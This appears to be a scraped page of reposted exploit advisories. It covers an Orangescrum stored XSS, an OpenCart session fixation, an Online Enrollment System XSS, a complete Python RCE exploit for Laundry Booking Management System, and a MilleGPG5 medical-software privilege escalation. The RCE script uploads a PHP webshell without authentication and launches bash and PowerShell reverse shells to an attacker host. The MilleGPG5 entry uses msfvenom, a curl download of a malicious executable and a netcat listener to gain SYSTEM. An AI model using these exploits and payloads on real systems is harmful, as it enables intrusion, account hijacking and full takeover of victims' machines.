----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/ajaxpostcase HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 393 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:51:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 698 Connection: close Content-Type: text/html; charset=UTF-8 {"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)> [...]
  22. HireHackking

    opencart 3.0.3.8 - Sessjion Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: opencart 3.0.3.8 - Sessjion Injection # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/ # Version: 3.0.3.8 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Sessjion Fixation / injection Session cookie "OCSESSID" is inproperly processed Attacker can set any value cookie and server set this value Becouse of that sesssion injection and session fixation vulnerability ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example Modify cookie "OCSESSID" value: ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/opencart-3.0.3.8/ Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Server set atttacker value: Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 15:16:06 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: PHP/8.0.11 Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18944 [...]
  23. HireHackking

    Laundry Booking Management System 1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE) # Date: 29/11/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # Vulnerability: Its possible create an user without being authenticated, # in this request you can upload a simple webshell which will used to get a # reverse shell import re, sys, argparse, requests, time, os import subprocess, pyfiglet ascii_banner = pyfiglet.figlet_format("Laundry") print(ascii_banner) print(" Booking Management System\n") print("----[Broken Access Control to RCE]----\n") class Exploit: def __init__(self,target, shell_name,localhost,localport,os): self.target=target self.shell_name=shell_name self.localhost=localhost self.localport=localport self.LHL= '/'.join([localhost,localport]) self.HPW= "'"+localhost+"'"+','+localport self.os=os self.session = requests.Session() #self.http_proxy = "http://127.0.0.1:8080" #self.https_proxy = "https://127.0.0.1:8080" #self.proxies = {"http" : self.http_proxy, # "https" : self.https_proxy} self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'} def create_user(self): url = self.target+"/pages/save_user.php" data = { "fname":"bypass", "email":"bypass@bypass.com", "password":"password", "group_id": "2", } #Creates user "bypass" and upload a simple webshell without authentication request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")}) time.sleep(3) if (request.status_code == 200): print('[*] The user and webshell were created\n') else: print('Something was wront...!') def execute_shell(self): if self.os == "linux": time.sleep(3) print("[*] Starting reverse shell\n") subprocess.Popen(["nc","-nvlp", self.localport]) time.sleep(3) #Use a payload in bash to get a reverse shell payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) print(request_rce.text) except requests.exceptions.ReadTimeout: pass elif self.os == "windows": time.sleep(3) print("[*] Starting reverse shell\n") subprocess.Popen(["nc","-nvlp", self.localport]) time.sleep(3) #Use a payload in powershell to get a reverse shell payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) print(request_rce.text) except requests.exceptions.ReadTimeout: pass else: print('Windows or linux') def get_args(): parser = argparse.ArgumentParser(description='Laundry Booking Management System') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-s', '--shell_name', dest="shell_name", required=True, action='store', help='shell_name') parser.add_argument('-l', '--localhost', dest="localhost", required=True, action='store', help='local host') parser.add_argument('-p', '--localport', dest="localport", required=True, action='store', help='local port') parser.add_argument('-os', '--os', choices=['linux', 'windows'], dest="os", required=True, action='store', help='linux,windows') args = parser.parse_args() return args args = get_args() target = args.target shell_name = args.shell_name localhost = args.localhost localport = args.localport xp = Exploit(target, shell_name,localhost,localport,args.os) xp.create_user() xp.execute_shell() #Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows #Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux
  24. HireHackking

    Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting # Date: 2021-08-31 # Exploit Author: Tushar Jadhav # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html # Version: 1.0 # Tested on: Windows 11 # Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/ # CVE: CVE-2021-40577 ============================================================================================================================= Stored Cross-site scripting(XSS): Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS. ============================================================================================================================== Attack vector: This vulnerability can result in the attacker can injecting the XSS payload in the User Registration section. Each time the admin login or basic user Login in the admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. =============================================================================================================================== Vulnerable Parameters: Name =============================================================================================================================== Steps for reproducing: 1. Go to add users section 2. fill in the details. & put <script>alert(document.cookie)</script> payload in Name parameter. 3. Once we click on save, We can see the XSS has been triggered. ================================================================================================================================ Request : POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1 Host: 192.168.1.205:81 Content-Length: 133 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.205:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3 Connection: close deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save= ===================================================================================================================================
  25. HireHackking

    MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://millegpg.it/ # Software Homepage: https://millegpg.it/ # Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe # Version: 5.7.2 # Tested on: Microsoft Windows 10 Enterprise x64 MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute". Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a. Affected version: MilleGPG5 5.7.2 # Details # By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below. # A low privilege account is able to rename the mysqld.exe file located in bin folder and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. (1) Impacted services. Any low privileged user can elevate their privileges abusing these services: C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe C:\Program Files\MilleGPG5\GPGService.exe Details: SERVICE_NAME: MariaDB-GPG TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MariaDB-GPG DEPENDENCIES : SERVICE_START_NAME : LocalSystem ------ SERVICE_NAME: GPGOrchestrator TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GPG Orchestrator DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) ...[SNIP]... --------------- C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system